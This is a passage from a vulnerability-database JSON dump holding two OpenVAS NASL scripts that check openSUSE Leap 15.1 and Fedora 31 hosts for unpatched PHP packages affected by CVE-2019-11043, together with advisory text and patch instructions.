"OPENVAS:1361412562310852842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852842", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852842\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:35:46 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"openSUSE: Security Advisory for php7 (openSUSE-SU-2019:2441-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2441-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-11/msg00011.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7'\n package(s) announced via the openSUSE-SU-2019:2441-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for php7 fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-11043: Fixed possible remote code execution via env_path_info\n underflow in fpm_main.c (bsc#1154999).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2441=1\");\n\n script_tag(name:\"affected\", value:\"'php7' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7\", rpm:\"apache2-mod_php7~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7-debuginfo\", rpm:\"apache2-mod_php7-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7\", rpm:\"php7~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath\", rpm:\"php7-bcmath~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath-debuginfo\", rpm:\"php7-bcmath-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2\", rpm:\"php7-bz2~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2-debuginfo\", rpm:\"php7-bz2-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar\", rpm:\"php7-calendar~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar-debuginfo\", rpm:\"php7-calendar-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype\", rpm:\"php7-ctype~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype-debuginfo\", rpm:\"php7-ctype-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl\", rpm:\"php7-curl~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl-debuginfo\", rpm:\"php7-curl-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba\", rpm:\"php7-dba~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba-debuginfo\", rpm:\"php7-dba-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debuginfo\", rpm:\"php7-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debugsource\", rpm:\"php7-debugsource~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-devel\", rpm:\"php7-devel~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom\", rpm:\"php7-dom~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom-debuginfo\", rpm:\"php7-dom-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-embed\", rpm:\"php7-embed~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-embed-debuginfo\", rpm:\"php7-embed-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant\", rpm:\"php7-enchant~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant-debuginfo\", rpm:\"php7-enchant-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif\", rpm:\"php7-exif~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif-debuginfo\", rpm:\"php7-exif-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi\", rpm:\"php7-fastcgi~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi-debuginfo\", rpm:\"php7-fastcgi-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo\", rpm:\"php7-fileinfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo-debuginfo\", rpm:\"php7-fileinfo-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird\", rpm:\"php7-firebird~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird-debuginfo\", rpm:\"php7-firebird-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm\", rpm:\"php7-fpm~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm-debuginfo\", rpm:\"php7-fpm-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp\", rpm:\"php7-ftp~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp-debuginfo\", rpm:\"php7-ftp-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd\", rpm:\"php7-gd~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd-debuginfo\", rpm:\"php7-gd-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext\", rpm:\"php7-gettext~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext-debuginfo\", rpm:\"php7-gettext-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp\", rpm:\"php7-gmp~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp-debuginfo\", rpm:\"php7-gmp-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv\", rpm:\"php7-iconv~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv-debuginfo\", rpm:\"php7-iconv-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl\", rpm:\"php7-intl~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl-debuginfo\", rpm:\"php7-intl-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json\", rpm:\"php7-json~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json-debuginfo\", rpm:\"php7-json-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap\", rpm:\"php7-ldap~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap-debuginfo\", rpm:\"php7-ldap-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring\", rpm:\"php7-mbstring~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring-debuginfo\", rpm:\"php7-mbstring-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql\", rpm:\"php7-mysql~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql-debuginfo\", rpm:\"php7-mysql-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc\", rpm:\"php7-odbc~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc-debuginfo\", rpm:\"php7-odbc-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache\", rpm:\"php7-opcache~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache-debuginfo\", rpm:\"php7-opcache-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl\", rpm:\"php7-openssl~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl-debuginfo\", rpm:\"php7-openssl-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl\", rpm:\"php7-pcntl~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl-debuginfo\", rpm:\"php7-pcntl-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo\", rpm:\"php7-pdo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo-debuginfo\", rpm:\"php7-pdo-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql\", rpm:\"php7-pgsql~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql-debuginfo\", rpm:\"php7-pgsql-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar\", rpm:\"php7-phar~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar-debuginfo\", rpm:\"php7-phar-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix\", rpm:\"php7-posix~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix-debuginfo\", rpm:\"php7-posix-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline\", rpm:\"php7-readline~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline-debuginfo\", rpm:\"php7-readline-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop\", rpm:\"php7-shmop~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop-debuginfo\", rpm:\"php7-shmop-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp\", rpm:\"php7-snmp~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp-debuginfo\", rpm:\"php7-snmp-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap\", rpm:\"php7-soap~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap-debuginfo\", rpm:\"php7-soap-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets\", rpm:\"php7-sockets~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets-debuginfo\", rpm:\"php7-sockets-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sodium\", rpm:\"php7-sodium~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sodium-debuginfo\", rpm:\"php7-sodium-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite\", rpm:\"php7-sqlite~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite-debuginfo\", rpm:\"php7-sqlite-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg\", rpm:\"php7-sysvmsg~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg-debuginfo\", rpm:\"php7-sysvmsg-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem\", rpm:\"php7-sysvsem~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem-debuginfo\", rpm:\"php7-sysvsem-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm\", rpm:\"php7-sysvshm~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm-debuginfo\", rpm:\"php7-sysvshm-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-test\", rpm:\"php7-test~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy\", rpm:\"php7-tidy~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy-debuginfo\", rpm:\"php7-tidy-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer\", rpm:\"php7-tokenizer~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer-debuginfo\", rpm:\"php7-tokenizer-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx\", rpm:\"php7-wddx~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx-debuginfo\", rpm:\"php7-wddx-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader\", rpm:\"php7-xmlreader~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader-debuginfo\", rpm:\"php7-xmlreader-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc\", rpm:\"php7-xmlrpc~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc-debuginfo\", rpm:\"php7-xmlrpc-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter\", rpm:\"php7-xmlwriter~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter-debuginfo\", rpm:\"php7-xmlwriter-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl\", rpm:\"php7-xsl~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl-debuginfo\", rpm:\"php7-xsl-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip\", rpm:\"php7-zip~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip-debuginfo\", rpm:\"php7-zip-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib\", rpm:\"php7-zlib~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib-debuginfo\", rpm:\"php7-zlib-debuginfo~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear\", rpm:\"php7-pear~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear-Archive_Tar\", rpm:\"php7-pear-Archive_Tar~7.2.5~lp151.6.13.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T14:48:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2019-4adc49a476", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2020-01-13T00:00:00", "id": "OPENVAS:1361412562310877110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877110", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877110\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:25:56 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for php FEDORA-2019-4adc49a476\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-4adc49a476\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T62LF4ZWVV7OMMIZFO6IFO5QLZKK7YRD\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the FEDORA-2019-4adc49a476 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language. PHP attempts to make it\neasy for developers to write dynamically generated web pages. PHP also\noffers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a\ndatabase-enabled webpage with PHP is fairly simple. The most common\nuse of PHP coding is probably as a replacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php)\nwhich adds support for the PHP language to Apache HTTP Server.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~7.3.11~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2021-07-28T14:40:48", "description": "The DiskFileItem class from the Apache Co